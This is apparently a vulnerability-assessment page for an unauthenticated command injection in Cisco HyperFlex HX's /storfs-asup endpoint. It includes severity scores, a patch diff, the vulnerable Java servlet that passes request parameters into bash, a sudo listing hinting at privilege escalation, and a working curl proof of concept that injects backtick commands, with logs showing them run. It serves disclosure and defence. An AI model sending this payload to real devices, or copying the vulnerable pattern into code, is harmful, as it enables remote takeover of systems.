10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.975 High
EPSS
Percentile
100.0%
Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
Recent assessments:
wvu-r7 at May 18, 2021 12:18am UTC reported:
Attacker value is a little lower because I was able to test only the installer.
Command injection in the /storfs-asup
endpoint’s token
and mode
parameters.
--- unpatched/web.xml 2021-05-17 19:06:17.000000000 -0500
+++ patched/web.xml 2021-05-17 19:06:23.000000000 -0500
@@ -69,17 +69,6 @@
</servlet-mapping>
<servlet>
- <servlet-name>Springpath Storfs ASUP</servlet-name>
- <servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class>
- <load-on-startup>1</load-on-startup>
- </servlet>
-
- <servlet-mapping>
- <servlet-name>Springpath Storfs ASUP</servlet-name>
- <url-pattern>/storfs-asup/*</url-pattern>
- </servlet-mapping>
-
- <servlet>
<servlet-name>Springpath Upgrade Image Upload Service</servlet-name>
<servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class>
</servlet>
protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
String action = request.getParameter("action");
if (action == null) {
String msg = "Action for the servlet need be specified.";
writeErrorResponse(response, msg);
return;
}
try {
String token = request.getParameter("token");
StringBuilder cmd = new StringBuilder();
cmd.append("exec /bin/storfs-asup ");
cmd.append(token);
String mode = request.getParameter("mode");
cmd.append(" ");
cmd.append(mode);
cmd.append(" > /dev/null");
logger.info("storfs-asup cmd to run : " + cmd);
ProcessBuilder pb = new ProcessBuilder(new String[] { "/bin/bash", "-c", cmd.toString() });
logger.info("Starting the storfs-asup now: ");
long startTime = System.currentTimeMillis();
Process p = pb.start();
InputStream errStream = p.getErrorStream();
String errMsg = FileUtils.readToString(errStream);
int exitCode = p.waitFor();
long timeTaken = System.currentTimeMillis() - startTime;
logger.info("storfs-asup command completed in (" + timeTaken + " ) milliseconds, with exit code (" + exitCode + ") and error message: " + errMsg);
errStream.close();
OutputStream outStream = p.getOutputStream();
outStream.flush();
outStream.close();
if (exitCode != 0)
throw new Exception(errMsg);
} catch (IOException ex) {
logger.error("Failed to generate asup: " + ex);
} catch (Exception ie) {
logger.error("Failed to run the /bin/storfs-asup command.");
} finally {
logger.info("Done executing asup command. ");
}
}
tomcat7@HyperFlex-Installer-4:~$ sudo -l
Matching Defaults entries for tomcat7 on HyperFlex-Installer-4:
!lecture, tty_tickets, !fqdn
User tomcat7 may run the following commands on HyperFlex-Installer-4:
(ALL) NOPASSWD: /opt/springpath/storfs-support/support.py
(ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_asup.sh
(ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_sch.sh
tomcat7@HyperFlex-Installer-4:~$ sudo /opt/springpath/storfs-support/support.py --help
Usage: support.py [options]
Options:
-h, --help show this help message and exit
-t TARGET, --target=TARGET
Target directory where the support bundle should go
(XXX: This could be a remote host(dir), ex:
hostname:/foo). Optional. Default = /tmp
-i INSTALLDIR, --installdir=INSTALLDIR
Install directory for storfs. Optional.
-k ZKDIR, --zkdir=ZKDIR
zookeeper directory for storfs. Optional
-l LOGDIR, --logdir=LOGDIR
log directory for storfs. Optional
--asupdir=ASUPDIR asup directory for storfs. Optional
-c COREDIR, --coredir=COREDIR
core directory for storfs. Optional
-m MANIFESTDIR, --manifestdir=MANIFESTDIR
Manifest directory for storfs support. All files with
.mfx extension in this directory will be processed.
Optional
--list List the manifests. Optional
-f MANIFESTFILES, --manifest-file=MANIFESTFILES
Manifest file to use for generating support. Multiple
manifest files can be specified. Manifests files are
required to have .mfx suffix. Optional (Cannot be with
-m option)
-e TOOLSEXEDIR, --toolsexedir=TOOLSEXEDIR
log directory for storfs binary files. Optional
--hypervdir=HYPERVDIR
log directory for hyperv binary files. Optional
-o TOOLSDIR, --toolsdir=TOOLSDIR
Path for storfs tools. Optional
-r RUNTIMEDIR, --runtimedir=RUNTIMEDIR
Path for runtime dir (which contains
storfs_running_process.pid files). Optional
-b BUILDTYPE, --buildtype=BUILDTYPE
Build type that was running. Optional. Default = debug
-a ADDITIONAL_FILES, --additional-files=ADDITIONAL_FILES
any additional files/directories (not in manifest)
that should be added to the support bundle. Optional.
--dry-run Process manifests to make sure that there are no
errors
tomcat7@HyperFlex-Installer-4:~$ ls /opt/springpath/storfs-support/*.mfx
/opt/springpath/storfs-support/springpath-basic.mfx /opt/springpath/storfs-support/springpath-zookeeper-no-db.mfx
/opt/springpath/storfs-support/springpath.mfx /opt/springpath/storfs-support/springpath-logs.mfx
/opt/springpath/storfs-support/springpath-default-os.mfx /opt/springpath/storfs-support/springpath-extended.mfx
/opt/springpath/storfs-support/springpath-default-asup.mfx /opt/springpath/storfs-support/deployment.mfx
/opt/springpath/storfs-support/springpath-mgmt.mfx /opt/springpath/storfs-support/springpath-witness.mfx
/opt/springpath/storfs-support/springpath-default-asup-cli-esx.mfx /opt/springpath/storfs-support/springpath-default-asup-hyperv.mfx
/opt/springpath/storfs-support/springpath-zookeeper.mfx /opt/springpath/storfs-support/springpath-default-asup-esx.mfx
/opt/springpath/storfs-support/springpath-default-event-asup.mfx /opt/springpath/storfs-support/springpath-perf.mfx
/opt/springpath/storfs-support/springpath-default-asup-cli-hyperv.mfx /opt/springpath/storfs-support/springpath-exhaustive.mfx
tomcat7@HyperFlex-Installer-4:~$ head /opt/springpath/storfs-support/springpath-basic.mfx
# Springpath manifest file. Contains just basic logs.
# Simplified from springpath-mgmt.mfx
["copy", "TIMEOUT_NONE", "IGNORE_ERROR", "/var/jail/var/log/springpath"]
["copy", "TIMEOUT_NONE", "IGNORE_ERROR", "/etc/iptables_node_cluster.rules"]
["exec", "TIMEOUT_NONE", "IGNORE_ERROR", "iptables --list -n -v"]
["exec", "TIMEOUT_NONE", "IGNORE_ERROR", "bom-check.sh"]
["exec", "TIMEOUT=120", "IGNORE_ERROR", "mstcli cluster diag"]
["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli cluster info"]
["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli appliance list"]
["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli datastore list"]
tomcat7@HyperFlex-Installer-4:~$
wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'
* Trying 192.168.123.133...
* TCP_NODELAY set
* Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)
> POST /storfs-asup HTTP/1.1
> Host: 192.168.123.133
> User-Agent: curl/7.64.1
> Accept: */*
> Content-Length: 28
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 28 out of 28 bytes
< HTTP/1.1 200 OK
< Server: nginx/1.8.1
< Date: Tue, 18 May 2021 00:54:26 GMT
< Content-Length: 0
< Connection: keep-alive
< Front-End-Https: on
<
* Connection #0 to host 192.168.123.133 left intact
* Closing connection 0
wvu@kharak:~$
==> /var/log/nginx/access.log <==
192.168.123.1 - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.1" 200 0 "-" "curl/7.64.1"
==> /var/log/springpath/stBootstrapGuiBackend.log <==
2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null
2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now:
2021-05-18-00:54:26.017 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory
2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command.
2021-05-18-00:54:26.020 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command.
==> /var/log/tomcat7/catalina.out <==
2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null
2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now:
2021-05-18-00:54:26.017 INFO com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory
2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command.
2021-05-18-00:54:26.020 INFO com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command.
==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <==
127.0.0.1 - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.0" 200 -
Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 5
10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.975 High
EPSS
Percentile
100.0%